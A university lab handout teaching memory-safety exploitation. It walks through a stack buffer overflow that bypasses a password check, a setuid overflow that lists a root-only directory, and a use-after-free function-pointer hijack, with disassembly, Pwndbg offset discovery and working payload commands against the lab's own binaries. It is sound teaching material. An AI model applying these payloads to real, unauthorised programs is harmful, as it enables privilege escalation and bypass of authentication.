Objectives and Logistics

Lab Presentation

The goal of this lab is to learn about and put in practice concepts about memory safety. We will explore a series of attacks exploiting memory vulnerabilities in binary programs. This lab is composed of 3 main exercises:

Stack Smashing: how a buffer overflow on the stack can be exploited by an attacker to take over the execution flow.
Setuid Exploitation: how to subvert programs executing with root privileges to bypass file system permission checks.
Temporal Safety Exploitation: how to exploit use after free bugs to hijack the execution flow of programs.

The first and third exercises are divided into two parts: a guided part with detailed instructions on how to proceed, and an advanced part which is less guided. The second exercise has only a guided part. You can access each exercise from the left menu. In absolute exercises are independent of each other, but we strongly recommend doing them in order. If you are stuck in the advanced part of an exercise, it's OK to start the next one though.

⚠️ Ethical Use Disclaimer

Although part of this lab exercise introduces techniques that are commonly associated with offensive security, their purpose in this context is purely educational. Our goal is to help you understand how attackers operate, so you can build stronger, more secure systems.

You are expected to use the knowledge and skills from this lab responsibly and ethically. Any use of these techniques outside of authorised, educational, or professional penetration testing contexts is strictly prohibited and may be illegal.

Submission Instructions

The deliverable for this exercise is a series of passwords. The submission is made through the CS Department’s Gitlab. You should have a fork of the repository named 60261-lab2-s-memory-safety_<your username>. The passwords should be submitted in a CSV file, that should be pushed alongside the C source code on the main branch. You can find an empty skeleton for such a file here. Submission details are given in the relevant parts of this exercise. To indicate that the submission is ready to be marked create a tag named lab2-submission.

The deadline for this assignment is Friday 31/10 2pm London time.

A few important points regarding the submission:

⚠️ Make sure you push to the precise repository mentioned above and not another one (do not fork it or create a new repo), and to tag your submission properly.

⚠️ The submission is to be made through GitLab only, there is no need to submit anything to Canvas.

⚠️ You need some basic knowledge of git and GitLab to submit that exercise. In the unlikely case you are not familiar with these tools, see some guidance here.

Failure to follow these instructions is likely to result in a mark of 0 for this exercise.

For any issues or questions, feel free to get in touch with the instructor through the discussion board on Canvas or during office hours (see the schedule on Canvas for the their time and location. You can also contact your student representatives.

High-Level Marking Scheme

Part	Marks
Stack Smashing (Guided)	/3.5
Stack Smashing (Advanced)	/5
Setuid Programs (Guided)	/3
Temporal Safety (Guided)	/3.5
Temporal Safety (Advanced)	/5
Total:	/20

Intended Learning Outcomes (ILOs)

By the end of this lab, students will be able to:

Analyse and reverse-engineer compiled binaries to understand their behaviour and detect vulnerabilities such as buffer overflows and use after free.
Demonstrate how these vulnerabilities can be exploited to bypass security measures by e.g. hijacking the execution flow of a program.
Understand the security implications of these vulnerabilities and reason about how to minimise the chances of introducing them when designing and implementing systems software.

Required Setup

This exercise requires the same setup as for lab 1.

Guided Example

Stack smashing is a type of buffer overflow attack where an attacker overwrites a program's call stack, typically by overflowing a buffer. Doing so the attacker can corrupt a return address on the stack and hijack the program's control flow, to e.g. bypass security check, spawn a shell, and more generally execute malicious code. A classic explanation of the stack smashing attack can be found in Aleph One’s seminal Phrack article: Smashing The Stack For Fun And Profit.

To demonstrate an example of stack smashing, we assume the following scenario: we consider a program containing a security check (e.g. password or license key verification). We (the attacker) do not have knowledge of the secret allowing to pass the check legitimately, and there is no simple way to extract it as we did in lab 1. Hence, our goal is going to be to bypass the security check, by taking over the program execution's flow. The program is distributed in binary form, and we do not have access to its source code.

Getting and Running the Target Binary

Download this binary. After the download you may need to give it execution rights with chmod +x smashme01. This program contains a password check. The user enters their password attempt as a command line parameter:

./smashme01
usage: ./smashme01 <password>

./smashme01 test
Authentication failed

Analysing the Target Binary with `checksec`

Let's start by analysing the program with checksec, which is a command-line tool that inspects compiled binaries to display their security-related properties.

If checksec is not already on your machine, install it:
mkdir -p ~/Software
wget https://github.com/slimm609/checksec/tarball/main -O ~/Software/checksec.tar.gz
cd ~/Software && tar xf checksec.tar.gz && mv slimm609-checksec-* checksec
echo "alias checksec=~/Software/checksec/checksec.bash" >>  ~/.bashrc
source ~/.bashrc
Adapt these steps to your environment (e.g. you may use a different shell).

checksec --file=smashme01
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   5 Symbols	  No	0		2		smashme01

This looks promising, here we can see that:

The stack canary, which is a protection against buffer overflows on the stack, is disabled. It means we will be able to exploit such overflows.
Position Independent Code (PIE) is disabled. This built time option, when enabled, allow the location where the binary is loaded in the address space to be randomised (i.e. different) each time the program is launched. No randomisation means we will mostly get the same memory layout throughout subsequent executions, which makes it easier to study.
Symbols are present: symbols are things like function and global variable names. The fact that they are present in the binary means that disassembly/decompilation will be able to do a better job, e.g. break down the code section into functions, identify them by their name, etc.

Disassembling and Decompiling the Target Binary

If we disassemble the program with objdump, we can see that it is made up of a few functions, including:

main
init
validate
do_important_stuff
Other functions which name cannot be recovered

Let's study a few of these functions more in detail. Decompiling the program (e.g. with RetDec) will allow us to get a better understanding of what they do. Let's start by looking at main. Decompiled by RetDec it looks like that (you may see different values for the addresses):

// Address range: 0x401a94 - 0x401b21
int main(int argc, char ** argv) {
    int64_t * v1 = (int64_t *)((int64_t)argv + 8); // 0x401add
    init(*v1);
    if ((int32_t)validate(*v1) == 0) {
        // 0x401b0b
        puts("Authentication failed");
    } else {
        // 0x401aff
        do_important_stuff();
    }
    // 0x401b1a
    return 0;
}

We can see that main gets the first command line argument from argv (argv + 8 corresponds to argv[1]), passes it to init, then to validate. If validate returns 0, it prints Authentication failed, else it calls do_important_stuff. Decompiled, do_important_stuff looks like this:

int64_t do_important_stuff(void) {
    // 0x401a06
    puts("Authentication successful");
    // ...
}

Clearly, this function is executed on the code path taken when authentication succeeds: that will be where we want to jump when we hijack the execution flow. Now let's look at validate:

int64_t validate(int64_t str) {
    int64_t result = 0; // 0x4018bc
    if (strlen((char *)str) == 40) {
        // 0x4018c5
        int64_t str2; // bp-152, 0x401885
        function_4016aa(str, &str2);
        result = memcmp(&g1, &str2, 40) == 0;
    }
    // 0x401905
    return result;
}

This function performs a length check on the password attempt (str), then passes it as parameter to another function (function_4016aa) alongside the address of a local variable str2. The local variable is then compared with memcmp to a global variable g1, and validate returns 0 if the comparison fails (memcmp returned something else than 0), and 1 if it succeeds (memcmp returned 0).

Recall that from how it is called in main, we know that validate returns 0 if the authentication failed, and something else if it succeeded. The validate function presents a structure typical of a hash check: the password attempt str is hashed into str2, and that hash is compared to g1 which is probably the hash of the correct password. We can also conclude that function_4016aa implements the hashing logic.

Although we can extract the hash of the correct password, we won't be able to crack it with a bruteforce or dictionary attack: for this exercise the passwords have been generated to be long and complex enough to be uncrackable in a reasonable time. Moreover, the hashing method seems custom and hard to reverse-engineer (function_4016aa is quite complex). Instead, we are going to attempt to entirely bypass the check, i.e. force the CPU to jump directly to do_important_stuff without calling validate and checking its return value.

Let's now have a look at init:

int64_t init(int64_t str2) {
    // 0x401a6e
    int64_t str; // bp-40, 0x401a6e
    return (int64_t)strcpy((char *)&str, (char *)str2);
}

This function calls strcpy to copy the password attempt coming from the command line (str2) into str, which points to the stack (bp is the base pointer that at runtime will point to the base of the stack frame for function). Given how strcpy works, str points to a buffer of fixed size, and as we can observe the program makes no attempt to check that str2 will not overflow that buffer.

To try to trigger the overflow, call the program with an abnormally long string given as password attempt:

./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[1]    20866 segmentation fault  ./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Function Calls and the Stack

Recall from the lectures that the machine code generated by the compiler pushes the return address on the stack upon a function call, and pops it then jumps to it when that function returns:

So with our target program, our goal to bypass the validation of the password attempt will be to overflow the buffer during function's execution through the strcpy in such a way to replace the return address with the address of our target: do_important_stuff.

Doing so, when function returns, the CPU will jump to do_important_stuff, bypassing the password check.

Understanding the Address Space Layout

Attack Payload: Overview

We have control over the data that will be written on the stack through the overflow: indeed that data comes from the command line argument passed to the program. The question here is what exactly should we pass as command line parameter so that the address of the function we want to jump to ends up written in the exact return address slot. This is our payload, and we should determine 1) how long should it be and 2) what should it contain for the attack to succeed. Our payload should be a concatenation of two things:

A certain amount of padding corresponding to the distance between the start of the buffer we overflow and the return address slot on the stack (see diagram above).
The address of do_important_stuff to be written in the return address slot.

Determining the address of do_important_stuff is easy: from our investigation with checksec we know that the program does not support PIE so the address of do_important_stuff will always be the same among different invocations of the program. It can be determined e.g. in objdump's output:

objdump --disassemble smashme01 | grep do_important_stuff
0000000000401a06 <do_important_stuff>:

Here its address is 0x401a06 (it may be different on your computer).

To determine how much padding our payload should contain before that address, we need to understand the memory layout on the stack at the time the overflow occur. To that aim we will use GDB and an addon called Pwndbg, which offers a better interface and many helpful features for reverse engineering.

Installing and Running Pwndbg

To install Pwndbg download a release as follows:

mkdir -P ~/Software
cd ~/Software
wget https://github.com/pwndbg/pwndbg/releases/download/2025.04.18/pwndbg_2025.04.18_x86_64-portable.tar.xz
tar xf pwndbg_2025.04.18_x86_64-portable.tar.xz && rm pwndbg_2025.04.18_x86_64-portable.tar.xz
echo "export PATH=\$PATH:~/Software/pwndbg/bin" >> ~/.bashrc
source ~/.bashrc

Pwndbg can then be launched as follows:

pwndbg smashme01
pwndbg>

To explore the Pwndbg's interface, place a breakpoint on main and run the program until it is hit:

pwndbg> break main
Breakpoint 1, 0x0000000000401a9c in main ()
pwndbg> run

Once the breakpoint is hit Pwndbg will display a lot more information vs. vanilla GDB. The screen is divided into 4 main blocks:

REGISTERS displays the content of the registers: the general purpose ones RAX to R15, the base pointer RBP, the stack pointer RSP, as well as the instruction pointer RIP.
DISASM displays a disassembly of the machine code, with the next instruction to be executed having its address highlighted in green.
STACK gives the content of the stack, one stack slot per line. The address of each slot is given on the right, and its content on the left. The first line represents the top of the stack, notice that its address is the same as the content of the stack pointer register RSP.
BACKTRACE shows the function call stack: the CPU currently runs belonging to main, which was previously called by __libc_start_call_main, which itself was called by __libc_start_main, which was called by _start. These last 3 functions implement the C standard library code that runs before main is invoked.

Pwndbg supports all GDB commands (e.g. break, run, etc.) and provides additional ones. You can explore these commands on this cheat sheet and on the relevant documentation.

Determining the Amount of Padding

Let's start by setting a breakpoint in the function containing the overflow, init, and run the program with a dummy password, xxx.

pwndbg> break init
Breakpoint 1 at 0x401a76
pwndbg> run xxx

When the breakpoint is hit, use the ni command to continue execution until the call to strcpy is highlighted, i.e. right before that call is made:

 ► 0x401a8c <init+30>    call   strcpy@plt                  <strcpy@plt>
        dest: 0x7fffffffdaf0 ◂— 0
        src: 0x7fffffffe00a ◂— 0x474e414c00787878 /* 'xxx' */

Pwndbg is aware of the calling convention and indicates the value of strcmp's parameters:

The source src points to the dummy password attempt we entered, xxx
The destination dest points to the buffer that we are going to overflow, here its value is 0x7fffffffdaf0.

Now to understand how much padding we need to include in our payload, we need to know how many bytes separate 0x7fffffffdaf0 from the location of the return address on the stack. The return address is located right before the base pointer, so we can display it with the following command:

pwndbg> x/gx $rbp+8
0x7fffffffdb18:	0x0000000000401ae8

Remember that the stack grows down so here we are looking at the 8 bytes present right before the base pointer. The return address is then 0x401ae8 (location in main where it was called), and it is located on the stack at 0x7fffffffdb18. We can now compute the distance between the return address 0x7fffffffdb18 and the first byte of the buffer we are going to overflow 0x7fffffffdaf0. In a separate terminal:

$ python3 -c "print(0x7fffffffdb18 - 0x7fffffffdaf0)"
40

Our payload will then be 40 bytes of padding, followed by the address of do_important_stuff.

Smashing the Stack

We determined earlier the address of do_important_stuff to be 0x401a06, so the execution of our attack is as follows:

$ ./smashme01 $'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x06\x1a\x40\x00\x00\x00\x00\x00'

The first 40 characters (each 1 byte) can be anything. Notice how the address we want to jump to is written backwards. This is because x86-64 is little-endian: the least significant byte of a multi-byte data type is stored at the lowest memory address.

The program should display the password that you have to submit to validate the exercise.

An Easier Way to Determine Padding Size

Determining the amount of padding required manually as we did can be quite cumbersome. An easier method, provided by Pwndbg, is to use a cyclic pattern. This is a long, unique, non-repeating sequence of characters, that we will use to overflow the buffer. Looking at what part of that sequence the execution flow ends up jumping to after the return address is overwritten will let Pwndbg compute easily the distance between the start of the buffer overflow, and the return address location.

To generate the cyclic pattern, we can use the built-in cyclic function within pwndbg. This is an example for generating 200 bytes of cyclic pattern:

pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

⚠️ For some reason using cyclic before having run the program in a Pwndbg session at least once leads to problems. Each time you launch Pwndbg make sure to type run at least once before using cyclic.

Your cyclic function may generate a different pattern. Now run the program and copy paste the patter as its command line parameter:

pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

Part of this pattern will overwrite the return value, then the CPU will try to jump to the overwritten value. Because it does not correspond to a valid address, the program will crash and Pwndbg will indicate us where the CPU tried to jump:

 ► 0x401a93 <init+37>    ret                                <0x6161616161616166>

This is the subset of the pattern (in hexadecimal) that overwrote the return address. Pwndbg has a convenient function to locate the offset of that subset from the start of the last pattern generated:

pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40

And there we have it: this is the distance between the start of the overflown buffer and the return address, i.e. the amount of padding required for our payload.

Quick Payload Generation with Python

Rather than writing the payload manually, a quick and easy way to generate it is with Python, writing the payload on a file:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + (0x401a06).to_bytes(8, 'little'))" > input.txt
$ ./smashme01 $(cat input.txt)

Here 40 is the amount of padding added, and 0x401a06 is our jump target.

Submission Instructions

Input the password extracted on the corresponding line of the CSV file in the submission git repository, i.e.:

smashme01,password-here

Advanced Stack Smashing

The two following binaries present a very similar structure to the one we exploited in the guided part of this exercise. In particular, they both present a stack-based buffer overflow, and they will display the password if you exploit that overflow in order to jump to the proper location in the program. Once you have found both passwords, add them to your submission.

smashme02
smashme03 (a bit harder)
smashme04 (harder)

Submission

Input the passwords found in the corresponding lines of the CSV file in the submission git repository, i.e.:

smashme02,password-for-smashme02-here
smashme03,password-for-smashme03-here
smashme04,password-for-smashme04-here

Setuid Programs

We saw in the last exercise that we can use stack overflows to bypass authentication methods. Here, we assume a scenario where the goal is to bypass file system permission checks and list the content of a directory we are not supposed to access. To that aim we are going to exploit a particular type of programs that run with the permissions of the user owning them, and not with the permissions of the user executing them: setuid binaries.

Understanding Linux File Permissions

Before we start working with setuid programs, let's explore how Linux file permissions and setuid work.

File Ownership

On a Linux system, every file and directory has 2 different kinds of owners:

User owner (UID) - The account that "owns" the file.
Group owner (GID) - A group of accounts that share certain permissions on the file.

Taking the example of a computer shared between different users, e.g. a lab machine at the University, you have a user account and your personal files in your home folder are set to be accessible only by your account: you cannot access files belonging to other students, and neither can they access your own files. Students also cannot access the files belonging to the system administrator (root). The administrator can assign students to specific groups, for example comp60261, so that file permissions for all users on the course can be set simultaneously.

You can view who owns a file using ls -l. Let's have a look at what this command says when we examine the ls command's binary:

$ ls -l /usr/bin/cp
-rwxr-xr-x 1 root root 151152 Sep 20  2022 /usr/bin/cp

Breaking this down:

-rwxr-xr-x - The first part shows us the type and permission bits
1 - The number of hard links
root - The user owner
root - The group owner
151152 - The file size in bytes
The rest is the modification timestamp and file/directory.

Permission Bits

To see what permissions each of the types of users has, we refer to the permission bits. They are displayed as a series of 10 characters. The first letter is the file type: - for a regular file, d for a directory, l for a symbolic link, etc.

Next come the permissions themselves: 3 blocks of 3 characters each. The first block relates to the permissions of the file's owner, the second to the permissions of the file's group, and the third to the permission of all other users not falling within the 2 aforementioned categories.

Each block has 3 characters. The first relates to read permission: the entity concerned by the block can have read access to the file (r) or not (-). The second character denotes write access (w) or not (-). The third denotes execution access (x) or not (-). For a file it means the concerned entity can run it as a program (e.g. with ./file), and for a folder it means the entity can list the content of that folder.

This is all illustrated here:

So we can see that the file /usr/bin/cp is readable, writable, and executable by its owner root, and can only be read and executed by all other users including other members of the root group.

Numeric permission notations

Permissions can also be written as three digits:

r = 4
w = 2
x = 1

These can be added together to represent a combination of permissions. For example:

rwx = 4 + 2 + 1 = 7
rw- = 4 + 2 = 6
r-x = 4 + 1 = 5

You can set file permissions numerically with chmod. For example if we want to create a file containing sensitive data and have it being accessible only by our user in read/write mode:

$ echo "secret" > file.txt
$ chmod 600 file.txt

Or alternatively using letters:

$ chmod u+x file.txt   # Add(+) the execute(x) permission to the user(u)
$ chmod g-w file.txt   # Remove(-) the write(w) permission from the group(g)

You can also change the owner and group of a file with chown:

chown emily file.txt   # Change the owner of file.txt to emily
chgrp comp60261 file.txt    # Change the group of file.txt to comp60261

`setuid` bit

For certain programs, the x of the execution permissions is replaced by an s. This is the setuid bit: it indicates that the program in question will run with the level of privileges (i.e. file system permissions) of the file owner instead of the privileges of the user who runs it.

To see an example of this, see the permissions of the /usr/bin/passwd program, which allows users to change their password:

> ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 68248 Mar 23  2023 /usr/bin/passwd

This tells us that when the passwd file is executed, it runs with the privileges of its owner, root. This is necessary because the system's passwords are stored in a file that can understandably only be written by root, /etc/shadow. However, non-root users must still be able to change their passwords, i.e. to run passwd. As a result system permissions are set up so that:

/etc/shadow is only accessible by root.
passwd is owned by root and executable by all users.
When passwd executes it actually runs with the permissions of root, hence it can edit /etc/shadow.

Although it is necessary for certain scenarios such as the one we just described, letting users execute programs with root permissions is obviously quite concerning from the security point of view. This is why you will find a very small number of setuid programs on a standard Linux system.

In this exercise, we will exploit a vulnerability in an setuid program to access, as a non-privileged user, files that are supposed to be only accessed by root.

Exercise Setup

For this exercise you need to run a particular Docker image: olivierpierre/comp60261-setuid. To that aim install the Docker command line engine and in a terminal run:

docker run -it olivierpierre/comp60261-setuid

You can then optionally attach vscode to the container. Open a workspace in the folder /home/user/workspace.

Note: this is an x86-64 Docker image, which may not work if you have an ARM-based MacBook. If you have an ARM MacBook an alternative is to use GitHub CodeSpaces, the exercise should be doable with the free tier available with GitHub student accounts. To launch a CodeSpace with the exercise's image, click here.

A third option (with Docker installed on an x86-64 machine) is to run this devcontainer. Once vscode has loaded the devcontainer, have it load the proper workspace by bringing up a terminal and entering:

code /home/user/workspace

Our Target Program

The setuid program we aim to exploit is in the workspace folder, named setuid01:

$ ls -l
total 28
drwx------ 1 root root  4096 Aug 20 14:58 private
drwxr-xr-x 1 user user  4096 Aug 20 15:04 public
-rwsr-xr-x 1 root root 14624 Aug 20 14:59 setuid01

There are also 2 folders: one named public is accessible by your user, and contains 3 files owned by that user:

$ ls public/
bread  cake  pasta

These are cooking recipes for various types of meals. The other, private, is owned by root and inaccessible by our user:

$ ls private/
ls: cannot open directory 'private/': Permission denied

The goal of the exercise is to list the content of that folder by exploiting the setuid binary.

The binary takes a name as command line parameter and list the available recipes i.e. the files contained in the public directory:

$ ./setuid01 
Usage: ./setuid01 <your name>
$ ./setuid01 pierre
Hello pierre, the recipes available are:
total 12
-rw-r--r-- 1 root root 58 Aug 18 15:00 bread
-rw-r--r-- 1 root root 55 Aug 18 15:00 cake
-rw-r--r-- 1 root root 49 Aug 18 15:00 pasta

This looks very much like the output of ls -l, and it is likely that setuid01 is calling that program under the hood.

Decompiling `setuid01`

Let's decompile that program with RetDec:

retdec-decompiler setuid01
cat setuid01.c

From RetDec's output we can see that the program indeed invokes the ls binary with execlp, which is a libc function to run binaries. The binary to run, and its command line arguments are passed as follows:

int execlp(char *file, char *arg0, ..., (char *) NULL);

execlp takes the name of the binary (searched in the $PATH), followed by a list of arguments -- with the second argument (here arg0) being always the name of the binary i.e. the same as the first. For example to invoke the command cat /home/pierre/test.txt one would call:

execlp("cat", "cat", "/home/pierre/test.txt", NULL);

As one can observe the list of arguments for the invocation of execlp in RetDec's output seems incomplete, e.g. the NULL closing argument is missing, so is the name of the target folder. Decompiling is never an exact science, and we are hitting one of RetDec's limitations here. Ghidra is a bit better at decompiling setuid01 here. It outputs the following:

bool main(int param_1,undefined8 *param_2) {
  char local_28 [24];
  undefined8 local_10;
  
  local_10 = 0x63696c627570;
  local_28[0] = '\0';
  // ...
  if (param_1 < 2) {
    printf("Usage: %s <your name>\n",*param_2);
  }
  else {
    strcpy(local_28,(char *)param_2[1]);
    printf("Hello %s, the recipes available are:\n");
    execlp("ls","ls",&DAT_00402046,&local_10,0);
  }
  return param_1 < 2;
}

Now we can see the other parameters passed to execlp. Double-clicking on DAT_00402046 in Ghidra will show that it is -l, the first command line parameter passed to ls.

The second command line parameter is local_10 and it seems to be at a first glance an integer, with a value of 0x63696c627570. However, we know that execlp takes only string parameters, set aside the last one which is always NULL. We can try to interpret the value of local_10 as a C (ASCII) string, for example by using an hexadecimal to ASCII converter. The converter tells us that this value translates to cilbup. Recall that numbers are stored in a little endian fashion on x86-64, so we need to invert these bytes: the string is public, it is indeed the last command line parameter passed to ls.

Now we know that we have a setuid program that list the content of a folder with root privileges. If we can replace the value of the public string with private, we will reach our goal and list the content of that folder with the permission of the owner: root. The good thing here is that we can see an unprotected call to strcpy into local_28 from param2[1], which is actually argv[1]. We can use that overflow to overwrite local_10: recall that the stack grows down with x86-64 so local_10 is likely located at a higher address vs. local_28 i.e. in the proper overflow direction.

Preparing the Payload

Let's run the program in Pwndbg (available in the Docker image) and use cyclic to check how much passing we need to pass to overflow the string containing public.

$ pwndbg setuid01
# Run the program once to avoid cyclic misbehaving
pwndbg> run
# Generate a cyclic pattern
pwndbg> cyclic 200
# Copy and paste your cyclic pattern and pass it as the command line parameter to setuid01
pwndbg> run aaaaaa # ...
ls: cannot access 'daaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa': No such file or directory
# Now let's see the offset in the pattern for what ls takes as target directory after the overflow:
pwndbg> cyclic -l daaaaaaa
Finding cyclic pattern of 8 bytes: b'daaaaaaa' (hex: 0x6461616161616161)
Found at offset 24

And we have our padding. Note that your pattern may be different so make sure to pass the first 8 bytes of what ls reports it can access to cyclic -l. Our payload will then be: 24 bytes of padding, then the ASCII string "private".

Launching the Attack

Launch the attack with the aforementioned payload:

$ ./setuid01 AAAAAAAAAAAAAAAAAAAAAAAAprivate

This should display the content of the private folder. It contains a file which name will give you the root password that you can submit to complete the exercise. To check that this password is correct you can try to log in as root with the su command, or use the web app.

Submission

Fill in the corresponding line in the CSV file on the submission git repository, i.e.:

setuid01,password-here

Guided Example

A temporal memory safety violation, also called use after free, is a type of bug corresponding to the following scenario:

int *ptr = malloc(/* ... */); // Allocate a buffer
// do something with the object here ...
free(ptr); // free the buffer: ptr is now a *dangling pointer*
// ...
printf("%d\n", *ptr); // access the freed memory

This can be exploited by an attacker that has some degree of control over the value of the dangling pointer or the content of the memory it points to. In the example above if the attacker can update the value of ptr (e.g. by overflowing another variable on the stack), then they get an arbitrary read memory primitive through the printf which displays the memory pointed by the dangling pointer. This is already a powerful primitive. Other severe consequences include hijacking the application's control flow, as we will achieve in this exercise.

Our Target Program

Download this binary. As usual, you will likely need to give it execution rights with chmod +x temporal01 before executing it.

The program maintains a simple database of usernames and integer IDs. When the program starts it initialises an ID and a name for the administrator, and prompt the user for additional names to add to the database:

$ ./temporal01            
System initialised with admin account:
id: 000, name: Administrator
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: bob
Added bob (id 001)
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: alice
Added alice (id 002)

Typing quit exits the program, and typing login prompts the user for the administrative password before executing some privileged code:

Enter name of next user to add, "login" to log in as admin, or "quit" to leave: login
Enter admin password: test  
Authentication failed!

Similar to the stack smashing exercises, bypassing the password check and running that privileged code is going to be our objective. Analysing the program with checksec gives us the following information:

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   3 Symbols         No    0               4               temporal01

We can see that the stack canary is enabled: this protection will make stack smashing attacks difficult, we need to find another way.

The Use After Free

Notice that when we exit the program with the quit command, the programs seems to misbehave and prints something that is partially garbage:

Enter name of next user to add, "login" to log in as admin, or "quit" to leave: quit
id: 000, name: q�
bye.

At that stage we suspect some form of memory safety related issue, possibly a use after free. To confirm that we can use Valgrind:

valgrind ./temporal01
# Quit with the quit command
==125776== Invalid read of size 8
==125776==    at 0x401CDD: main (in /home/pierre/Downloads/temporal01)
==125776==  Address 0x4a4e078 is 56 bytes inside a block of size 64 free'd
==125776==    at 0x484417B: free (vg_replace_malloc.c:872)
==125776==    by 0x401C51: main (in /home/pierre/Downloads/temporal01)
==125776==  Block was alloc'd at
==125776==    at 0x48417B4: malloc (vg_replace_malloc.c:381)
==125776==    by 0x401BC8: main (in /home/pierre/Downloads/temporal01)
# ...

Valgrind indicates that memory that was previously freed by the program is accessed! This is indeed a use after free.

To better understand how it happens we can decompile the binary. Unfortunately here RetDec is not very helpful as it is unable to decompile the code corresponding to the use-after-free (decompiling/disassembling is not an exact science...). Ghidra is more useful for this particular case. In case you do not have it at hand, this is a simplified version of the decompilation of the main function of our program:

undefined8 main(void)
{
  // ...
  undefined8 *__ptr;
  // ...
  undefined8 local_a0;
  // ...
  __ptr = (undefined8 *)malloc(0x40);
  // ...
  free(__ptr);
  local_ac = 1;
  do {
    local_a0 = (char *)malloc(0x40);
    // ...
    gets(local_a0);
    // ...
    (*(code *)__ptr[7])(__ptr);
    // ...
   }
// ...

We can see here that a pointer __ptr is declared and made to point to a buffer allocated with malloc. Later it is freed, and after that free it is ptr is used: (*(code *)__ptr[7])(__ptr);. This code corresponds to the invocation of a function pointer. If we can somehow update the value of that function pointer before it is invoked, we can take over the execution flow to bypass the password check.

How can we modify the value of the pointer? Notice that after it is freed, the program allocates another buffer of the same size (0x40), pointed to by local_a0. Most implementation of malloc aim to limit memory usage and fragmentation: to that aim they will reuse memory freed for subsequent allocations. So it's likely that what is pointed by local_a0 will be very close to the memory pointed by the dangling pointer.

Also notice that we can overflow the buffer pointed by local_a0: it is written to through the infamous gets libc function. Gets reads characters from the standard input and writes them in the buffer passed as parameters. There is no control over how many characters are read and no checks for overflow, hence in practice this function should never be used. Here it is going to be convenient for our attack.

The Overflow

To confirm that the buffer pointed by local_a0 can be overflown, run the program, input a very long string when prompted, then exit:

$ ./temporal01                                                                                                                                                                130 ↵
System initialised with admin account:
id: 000, name: Administrator
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Added xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (id 001)
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: quit
[1]    136923 segmentation fault  ./temporal01

The segmentation fault error is encouraging. If we try that again in Pwndbg, we can get more information about what happened:

 ► 0x401ceb <main+340>    call   rdx                         <0x7878787878787878>

The CPU tried to jump to address 0x7878787878787878. Of course it is not mapped/not accessible hence the fault. 0x78 is the ASCII code for the letter x: we have successfully rewritten the function pointer.

The Payload

Our payload will look a bit like the ones we used for stack smashing: a certain amount of padding, followed by the address of the function we want to redirect the control flow to. To find the address of that function you can decompile with RetDec: you will see that a function named secret_admin_code is called when the authentication succeeds: this is our target. Let's find its address:

$ nm temporal01  | grep secret_admin_code
0000000000401ad2 T secret_admin_code

Then to find the amount of padding required, the best way is to use the cyclic feature of Pwndbg:

pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
pwndbg> run
System initialised with admin account:
id: 000, name: Administrator
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Added aaaaaaaabaaaaaaacaaaaaaadaaaaaaa (id 001)
Enter name of next user to add, "login" to log in as admin, or "quit" to leave: quit
► 0x401ceb <main+340>    call   rdx                         <0x6161616161616168>

Let's find the offset when 0x6161616161616168 is located in the cyclic pattern:

pwndbg> cyclic -l 0x6161616161616168
Finding cyclic pattern of 8 bytes: b'haaaaaaa' (hex: 0x6861616161616161)
Found at offset 56

Our payload should then be: 56 bytes of padding, followed by 0x401ad2, the address where we want to jump to when the function pointer is invoked.

Launching the Attack

We can then prepare our payload with Python:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*56 + (0x401ad2).to_bytes(8, 'little') + b'\n' + b'quit')" > input.txt

And launch the attack:

$ ./temporal01 < input.txt

When the privileged code runs it will display the password you need for submitting this part of the exercise.

Submission

Fill in the corresponding line in the CSV file on the submission git repository, i.e.:

